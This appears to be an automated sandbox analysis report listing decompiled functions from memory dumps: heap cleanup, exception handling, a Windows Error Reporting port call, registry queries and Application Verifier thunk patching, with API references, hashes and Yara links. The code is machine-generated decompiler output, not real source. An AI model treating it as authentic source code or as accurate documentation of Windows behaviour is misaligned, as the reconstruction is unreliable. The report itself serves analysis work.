
API ID: A.00000002.476687065.0000000003370000.00000040.00000001$Section.0000001$View$Close.0000001CreateUnmap
String ID:
API String ID: 2447218631-0
Opcode ID: 77c0bd51e630a667eaba0cead26d1e37344295029b98cca860612fa6308b154e
Instruction ID: 41b50ff05e453f16cae4cfe3434ca6438f000da9dad0783f5b38f7c0fa5e1fb1
Opcode Fuzzy Hash: 77c0bd51e630a667eaba0cead26d1e37344295029b98cca860612fa6308b154e
Instruction Fuzzy Hash: 81313CB5E00259ABDB20CF9AD840EAEFBF9EF95710F15416AE911BB350D7714A00CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0033AC30, Relevance: 6.1, APIs: 4, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 0033AC8E
RtlFreeHeap.NTDLL(00000000), ref: 0033AC95
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 0033ACBE
RtlFreeHeap.NTDLL(00000000), ref: 0033ACC5

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 6a9717e2b2c92ff408a9b7f63cb48f402040b494fe45bfe5c3d2f0b066879909
Instruction ID: 5d591c30acb01aa568da1c9c71c743c01f868364daf9fa8b921d69ec0bda8bdc
Opcode Fuzzy Hash: 6a9717e2b2c92ff408a9b7f63cb48f402040b494fe45bfe5c3d2f0b066879909
Instruction Fuzzy Hash: A4110831200A419BCB339F689889B763BA9AF45711F244949F4CBCB651CB30DC42D762

Uniqueness

Uniqueness Score: -1.00%

Function 00346FE3, Relevance: 6.0, APIs: 4, Instructions: 13COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00347119,00331000), ref: 00346FEA
UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00347119,?,00347119,00331000), ref: 00346FF3
GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00347119,00331000), ref: 00346FFE
TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00347119,00331000), ref: 00347005

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 017582ba3d0b3810d825b9470a977085119c95232ce148913895d4914fac7b99
Instruction ID: 21d5289797da01966c6866e30e40850058515cedccfb06aebf80c68e62ac9faa
Opcode Fuzzy Hash: 017582ba3d0b3810d825b9470a977085119c95232ce148913895d4914fac7b99
Instruction Fuzzy Hash: 66D0C932180208BBCB222BE1EC0CF893E3CFB84312F144A42F30DC2021CA318491DB61

Uniqueness

Uniqueness Score: -1.00%

Function 03421570, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
nativeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E03421570(intOrPtr __ecx, signed int __edx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v36;
				char _v52;
				char _v56;
				long* _v60;
				short _v64;
				char _v68;
				char _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void _v100;
				long* _v104;
				long* _v108;
				long* _v112;
				long* _v116;
				long* _v120;
				char _v124;
				char _v132;
				void* __ebx;
				void* __esi;
				void* __ebp;
				long _t48;
				long _t53;
				long _t60;
				signed int _t62;
				signed int _t63;
				signed int* _t64;
				signed int* _t71;
				long* _t74;
				signed int _t85;

				_t83 = __edi;
				_t82 = __edx;
				_v8 =  *0x348d360 ^ _t85;
				_t74 = 0;
				_v76 = __edx;
				_v80 = __ecx;
				_v60 = 0;
				_v56 = 0;
				_v68 = 0;
				_v64 = 0x500;
				_t48 = E034216FA();
				_t84 = _t48;
				if(_t48 < 0) {
					L19:
					if(_v60 != 0) {
						NtClose(_v60);
					}
					return E033DB640(_t84, _t74, _v8 ^ _t85, _t82, _t83, _t84);
				}
				_t53 = NtQuerySystemInformation(0x73,  &_v100, 8, 0);
				_t84 = _t53;
				if(_t53 < 0) {
					goto L19;
				}
				_t78 = _v100;
				_t84 = E0342176C(_v100);
				if(_t84 < 0) {
					goto L19;
				}
				_t93 = _t84 - 0x102;
				if(_t84 == 0x102) {
					goto L19;
				}
				E033DBB40(_t78,  &_v132, L"\\WindowsErrorReportingServicePort");
				E033DFA60( &_v52, 0, 0x2c);
				_v36 = 0x568;
				_push( &_v56);
				_t60 = E03421879(0,  &_v68, __edi, _t84, _t93);
				_t84 = _t60;
				if(_t60 >= 0) {
					_t62 = _v96;
					_v124 = 0x18;
					_v120 = 0;
					_v112 = 0;
					_v116 = 0;
					_v108 = 0;
					_v104 = 0;
					if(_t62 != 0xffffffff) {
						_t82 = _t62 * 0xffffd8f0 >> 0x20;
						_t63 = _t62 * 0xffffd8f0;
						__eflags = _t63;
						_v92 = _t63;
						_t64 =  &_v92;
						_v88 = _t62 * 0xffffd8f0 >> 0x20;
					} else {
						_t74 = 1;
						_t64 = 0;
					}
					_push(_t64);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(_v56);
					_push(0x20000);
					_push( &_v52);
					_push( &_v124);
					_push( &_v132);
					_push( &_v60);
					_t84 = E033D9C70();
					if(_t84 >= 0 && _t84 != 0x102) {
						_v72 = 0x568;
						if(_t74 == 0) {
							_t71 =  &_v92;
						} else {
							_t71 = 0;
						}
						_t74 = _v76;
						_push(_t71);
						_push(0);
						_push( &_v72);
						_push(_t74);
						_push(0);
						_push(_v80);
						_push(0x20000);
						_push(_v60);
						_t84 = E033D9DA0();
						if(_t84 >= 0 && _t84 != 0x102) {
							_t84 =  *(_t74 + 0x1c);
							if( *(_t74 + 0x1c) >= 0) {
								_t84 = 0;
							}
						}
					}
				}
				if(_v56 != 0) {
					E03421AD6(_v56);
				}
				goto L19;
			}

0x03421570
0x03421570
0x03421582
0x03421586
0x03421588
0x0342158c
0x0342158f
0x03421592
0x03421595
0x03421598
0x0342159e
0x034215a3
0x034215a7
0x034216da
0x034216de
0x034216e3
0x034216e3
0x034216f9
0x034216f9
0x034215b6
0x034215bb
0x034215bf
0x00000000
0x00000000
0x034215c5
0x034215cd
0x034215d1
0x00000000
0x00000000
0x034215d7
0x034215dd
0x00000000
0x00000000
0x034215ec
0x034215f8
0x03421600
0x0342160d
0x03421611
0x03421616
0x0342161a
0x03421620
0x03421623
0x0342162a
0x0342162d
0x03421630
0x03421633
0x03421636
0x0342163c
0x03421649
0x03421649
0x03421649
0x0342164b
0x0342164e
0x03421651
0x0342163e
0x0342163e
0x03421640
0x03421640
0x03421654
0x03421657
0x03421658
0x03421659
0x0342165a
0x0342165b
0x03421661
0x03421666
0x0342166a
0x0342166e
0x03421672
0x03421678
0x0342167c
0x03421686
0x0342168f
0x03421695
0x03421691
0x03421691
0x03421691
0x03421698
0x0342169b
0x0342169c
0x034216a1
0x034216a2
0x034216a3
0x034216a5
0x034216a8
0x034216ad
0x034216b5
0x034216b9
0x034216c3
0x034216c8
0x034216ca
0x034216ca
0x034216c8
0x034216b9
0x0342167c
0x034216d0
0x034216d5
0x034216d5
0x00000000

APIs

NtQuerySystemInformation.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000073,?,00000008,00000000,?,00000568), ref: 034215B6

Part of subcall function 033D9860: LdrInitializeThunk.0000001A.00000002.476687065.0000000003370000.00000040.00000001. ref: 033D986A

Part of subcall function 0342176C: NtWaitForSingleObject.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000568,00000000,?,00000568,00100001,?,?,00000000), ref: 034217E1
Part of subcall function 0342176C: NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000568,00000568,00100001,?,?,00000000), ref: 034217EB

NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,?,00000568), ref: 034216E3

Strings

\WindowsErrorReportingServicePort, xrefs: 034215E3

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001$Close.0000001$Information.0000001InitializeObject.0000001QuerySingleSystemThunk.0000001Wait
String ID: \WindowsErrorReportingServicePort
API String ID: 1364545056-589754893
Opcode ID: a2b3915bcd3451bf1e44e451a2d1d19399ca66e177227d0ebb56b4c4f22e228e
Instruction ID: 943c0f70362803c5b8e5a76cd7bb3f3bb0f6fc8a3d48f69fabdf0c2ed62a1847
Opcode Fuzzy Hash: a2b3915bcd3451bf1e44e451a2d1d19399ca66e177227d0ebb56b4c4f22e228e
Instruction Fuzzy Hash: 8E414DB6D0122CABDB11DFA5D884AEEFBB9BF04710F58012AE905BF260D7709D45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 033CF0BF, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
nativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E033CF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				void* _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E033B4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E033D9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E033D9990();
						if(_t108 < 0) {
							L10:
							NtClose(_v60);
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x522bb01a
							_t109 = L033B4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000522b
								E033DF3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000522b
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										NtClose(_v60);
										L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x033cf0d3
0x033cf0d9
0x033cf0e0
0x033cf0e7
0x033cf0f2
0x033cf0f4
0x033cf0f8
0x033cf100
0x033cf108
0x033cf10d
0x033cf115
0x033cf116
0x033cf11f
0x033cf123
0x033cf124
0x033cf12c
0x033cf130
0x033cf134
0x033cf13d
0x033cf144
0x033cf14b
0x033cf152
0x0340bab0
0x0340bab0
0x033cf158
0x033cf158
0x033cf15a
0x033cf160
0x033cf165
0x033cf166
0x033cf16f
0x033cf173
0x0340baa7
0x0340baab
0x00000000
0x033cf179
0x033cf179
0x033cf18d
0x033cf191
0x0340baa2
0x00000000
0x033cf197
0x033cf19b
0x033cf1a2
0x033cf1a9
0x033cf1af
0x033cf1b2
0x033cf1b6
0x033cf1b9
0x033cf1c0
0x033cf1c4
0x033cf1d8
0x033cf1df
0x033cf1e3
0x033cf1e6
0x033cf1eb
0x033cf1ee
0x033cf1f4
0x033cf20f
0x0340babb
0x0340bacc
0x0340bad1
0x033cf215
0x033cf218
0x033cf226
0x033cf22b
0x00000000
0x033cf22b
0x033cf1f6
0x033cf1f6
0x033cf1f9
0x033cf1fb
0x033cf1fb
0x033cf1f4
0x033cf191
0x033cf173
0x033cf152
0x033cf203

APIs

NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,00000000,00000003,?,00000008,00000004,?,00000000,?,?,?,?,00000021,00100020,?), ref: 0340BAAB
NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(?,?,00522B99,?,00000000,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,034879A0,034879A0), ref: 0340BABB

Strings

@, xrefs: 033CF124

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001Close.0000001
String ID: @
API String ID: 971714608-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 6b480089de4b4265372c4320dbb9b6eac5951da7ef063deba0d7a7aa30b14ba9
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 12515C756047509FC320DF19C880A67BBF9FF48710F00892EF9959B690E774E914CB95

Uniqueness

Uniqueness Score: -1.00%

Function 03413540, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130
nativeCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E03413540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				void* _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				void* _v1176;
				long _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t41;
				short _t42;
				intOrPtr _t80;
				long _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x348d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E033D0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E03413706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E033DFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E03413540;
						E033DFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E033EDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E03420C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E033D97C0();
					}
					return E033DB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E03413971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E03413884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E033DFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_t81 = NtQueryValueKey(_v1156,  &_v1176, 2,  &_v96, 0x50,  &_v1180);
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E03413787(_a4,  &_v352, _t80);
						}
					}
					L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				NtClose(_v1156);
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x03413552
0x0341355a
0x0341355d
0x03413566
0x03413567
0x0341357e
0x0341358f
0x034135a1
0x034135a5
0x0341366b
0x0341366b
0x0341366d
0x03413672
0x03413679
0x03413685
0x0341368d
0x0341369d
0x034136a7
0x034136b8
0x034136c6
0x034136c7
0x034136dc
0x034136e1
0x034136e7
0x034136e9
0x034136e9
0x03413703
0x03413703
0x034135b5
0x034135c0
0x034135c4
0x00000000
0x00000000
0x034135ca
0x034135d7
0x034135e2
0x034135e6
0x034135e8
0x034135f5
0x034135fa
0x0341361e
0x03413622
0x03413628
0x0341362f
0x0341362f
0x03413636
0x03413638
0x0341363b
0x03413642
0x03413642
0x03413636
0x03413657
0x03413657
0x03413662
0x03413669
0x00000000
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 03413884: NtQueryValueKey.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(?,00000000,00000002,00000000,00000000,?,?,00000000,00000000,00000000), ref: 034138BF

NtQueryValueKey.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(?,?,00000002,?,00000050,?,?,00000000,?), ref: 03413619
NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(?,?,?,000000FC,?,?,00000000,00000000,00000000,?,?,00000000,?), ref: 03413662

Strings

BinaryHash, xrefs: 0341358F

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001$Key.0000001QueryValue$Close.0000001
String ID: BinaryHash
API String ID: 2171277605-2202222882
Opcode ID: 867195231b9c853054deecd051e08134361d01cd05bf2816ad8ea62cd606468d
Instruction ID: 9bc5b4042c0ed7b1986b2f35059fb41288d63fd4b4cdfbd67b083d425302e691
Opcode Fuzzy Hash: 867195231b9c853054deecd051e08134361d01cd05bf2816ad8ea62cd606468d
Instruction Fuzzy Hash: 8A4124B6D1062C9BDB21DE50DC80F9EB77CAB44714F0045A6E609AF250DB309E988F98

Uniqueness

Uniqueness Score: -1.00%

Function 0341FB88, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0341FB88(intOrPtr __ecx, void* __edx) {
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int* _v28;
				intOrPtr _v32;
				char _v36;
				long _v40;
				long _v76;
				long _v92;
				void* _v96;
				intOrPtr _v124;
				char _v156;
				signed int _t37;
				intOrPtr* _t42;
				signed int* _t43;
				signed int* _t44;
				void* _t47;
				signed int _t49;
				intOrPtr _t56;
				signed int* _t57;
				intOrPtr* _t61;
				signed int* _t62;
				signed int* _t63;
				signed int _t69;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				void* _t76;
				void* _t77;

				_t56 = __ecx;
				_v24 = __ecx;
				if( *0x348b238 == 0) {
					return 0xc0000022;
				}
				E033DFA60( &_v156, 0, 0x6c);
				_t77 = _t76 + 0xc;
				_v124 = _t56;
				_t37 = E033CC532( &_v156);
				__eflags = _t37;
				if(_t37 >= 0) {
					_t75 = _v96;
					__eflags = _t75;
					if(_t75 != 0) {
						_t73 = _v92 >> 2;
						__eflags = _t73;
						while(1) {
							_v16 = _t73;
							if(__eflags == 0) {
								break;
							}
							__eflags =  *_t75;
							if( *_t75 == 0) {
								L25:
								_t75 = _t75 + 4;
								_t73 = _t73 - 1;
								__eflags = _t73;
								continue;
							}
							_t42 =  *0x34870c0; // 0x0
							__eflags = _t42 - 0x34870c0;
							if(_t42 == 0x34870c0) {
								goto L25;
							} else {
								goto L8;
							}
							do {
								L8:
								_t61 = _t42;
								_t69 = 0;
								_t42 =  *_t42;
								_v20 = _t61;
								_v32 = _t42;
								_t62 =  *(_t61 + 0x14);
								_v28 = _t62;
								_v12 = 0;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L23;
								}
								_t43 = _t62;
								do {
									_t44 = _t43[3];
									_t74 = 0;
									_v8 = _t44;
									__eflags =  *_t44;
									if( *_t44 == 0) {
										goto L21;
									}
									_t57 = _t44;
									_t63 = _t44;
									do {
										_t47 =  *_t75;
										__eflags = _t47 - _t57[1];
										if(_t47 == _t57[1]) {
											E03446AEB(_t47, 1,  &_v36);
											_t49 = _t57[2];
											__eflags = _t49;
											if(_t49 == 0) {
												E0339B150("AVRF: internal error: New thunk for %s is null. \n",  *_t57);
												asm("int3");
											} else {
												 *_t75 = _t49;
											}
											__eflags =  *0x34887c8 & 0x00000001;
											if(( *0x34887c8 & 0x00000001) != 0) {
												_push(_t57[2]);
												_t21 = _v20 + 0xc; // 0x800cec83
												_push( *_t21);
												_push( *_t57);
												E0339B150("AVRF: Snapped (%ws: %s) with (%ws: %p). \n",  *((intOrPtr*)(_v24 + 0x30)));
												_t77 = _t77 + 0x14;
											}
											_t63 = _v8;
										}
										_t74 = _t74 + 1;
										_t57 = _t63 + _t74 * 0xc;
										__eflags =  *_t57;
									} while ( *_t57 != 0);
									_t62 = _v28;
									_t69 = _v12;
									L21:
									_t69 = _t69 + 1;
									_v12 = _t69;
									_t43 = _t62 + (_t69 << 4);
									__eflags =  *_t43;
								} while ( *_t43 != 0);
								_t42 = _v32;
								L23:
								__eflags = _t42 - 0x34870c0;
							} while (_t42 != 0x34870c0);
							_t73 = _v16;
							goto L25;
						}
						return NtProtectVirtualMemory(0xffffffff,  &_v96,  &_v92, _v76,  &_v40);
					}
					return 0;
				}
				return _t37;
			}

0x0341fb9c
0x0341fb9f
0x0341fba2
0x00000000
0x0341fba4
0x0341fbb9
0x0341fbbe
0x0341fbc1
0x0341fbca
0x0341fbcf
0x0341fbd1
0x0341fbd7
0x0341fbda
0x0341fbdc
0x0341fbe8
0x0341fbeb
0x0341fccf
0x0341fccf
0x0341fcd2
0x00000000
0x00000000
0x0341fbf2
0x0341fbf5
0x0341fcc9
0x0341fcc9
0x0341fccc
0x0341fccc
0x00000000
0x0341fccc
0x0341fbfb
0x0341fc00
0x0341fc05
0x00000000
0x00000000
0x00000000
0x00000000
0x0341fc0b
0x0341fc0b
0x0341fc0b
0x0341fc0d
0x0341fc0f
0x0341fc11
0x0341fc14
0x0341fc17
0x0341fc1a
0x0341fc1d
0x0341fc20
0x0341fc22
0x00000000
0x00000000
0x0341fc28
0x0341fc2a
0x0341fc2a
0x0341fc2d
0x0341fc2f
0x0341fc32
0x0341fc34
0x00000000
0x00000000
0x0341fc36
0x0341fc38
0x0341fc3a
0x0341fc3a
0x0341fc3c
0x0341fc3f
0x0341fc4a
0x0341fc4f
0x0341fc52
0x0341fc54
0x0341fc61
0x0341fc68
0x0341fc56
0x0341fc56
0x0341fc56
0x0341fc69
0x0341fc70
0x0341fc72
0x0341fc78
0x0341fc78
0x0341fc7e
0x0341fc88
0x0341fc8d
0x0341fc8d
0x0341fc90
0x0341fc90
0x0341fc93
0x0341fc97
0x0341fc99
0x0341fc99
0x0341fc9e
0x0341fca1
0x0341fca4
0x0341fca4
0x0341fca7
0x0341fcad
0x0341fcaf
0x0341fcaf
0x0341fcb8
0x0341fcbb
0x0341fcbb
0x0341fcbb
0x0341fcc6
0x00000000
0x0341fcc6
0x00000000
0x0341fce9
0x00000000
0x0341fbde
0x0341fcf4

Strings

AVRF: Snapped (%ws: %s) with (%ws: %p). , xrefs: 0341FC83
AVRF: internal error: New thunk for %s is null. , xrefs: 0341FC5C

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: AVRF: Snapped (%ws: %s) with (%ws: %p). $AVRF: internal error: New thunk for %s is null.
API String ID: 0-3401590907
Opcode ID: 3a65e7e2def9e3f068e17898cb1dabd9180ec00389392d6f4dc7a7eb49671c6a
Instruction ID: f4d4981a7224be360745528496a35efeb6d1009ad0e967c5cd29e17494836949
Opcode Fuzzy Hash: 3a65e7e2def9e3f068e17898cb1dabd9180ec00389392d6f4dc7a7eb49671c6a
Instruction Fuzzy Hash: DB41A171E006089FDB14CF98D880BAEBBF5FB84310F29416AD816EF351E7309956CB54

Uniqueness

Uniqueness Score: -1.00%

Function 03413884, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03413884(void* __ecx, intOrPtr* __edx, void** _a4) {
				long _v8;
				void* _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				void* _v24;
				void* _t38;
				void* _t40;
				short _t41;
				void* _t44;
				void* _t47;
				long _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_t47 = 0;
				_t48 = NtQueryValueKey(__ecx,  &_v24, 2, 0, 0,  &_v8);
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L033B4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_t48 = NtQueryValueKey(_v12,  &_v24, 2, _t47, _v8,  &_v8);
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x03413893
0x03413896
0x03413899
0x0341389f
0x034138a0
0x034138a4
0x034138a9
0x034138b1
0x034138b4
0x034138bd
0x034138c4
0x034138c8
0x034138ca
0x034138ca
0x034138d5
0x0341393e
0x03413940
0x03413942
0x03413952
0x03413954
0x03413961
0x03413961
0x03413967
0x0341396e
0x0341396e
0x03413947
0x0341394c
0x00000000
0x0341394c
0x034138ea
0x034138ee
0x0341390b
0x0341390f
0x03413950
0x00000000
0x03413950
0x03413915
0x0341391d
0x0341391d
0x03413922
0x03413926
0x00000000
0x03413928
0x0341392b
0x0341392b
0x03413935
0x03413937
0x03413937
0x00000000
0x03413935
0x03413926
0x034138f0
0x00000000

APIs

NtQueryValueKey.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(?,00000000,00000002,00000000,00000000,?,?,00000000,00000000,00000000), ref: 034138BF
NtQueryValueKey.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,00000000,00000002,00000000,?,?,00000008,?,?,00000000,00000000,00000000), ref: 03413906

Strings

BinaryName, xrefs: 034138B4

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001Key.0000001QueryValue
String ID: BinaryName
API String ID: 2112333492-215506332
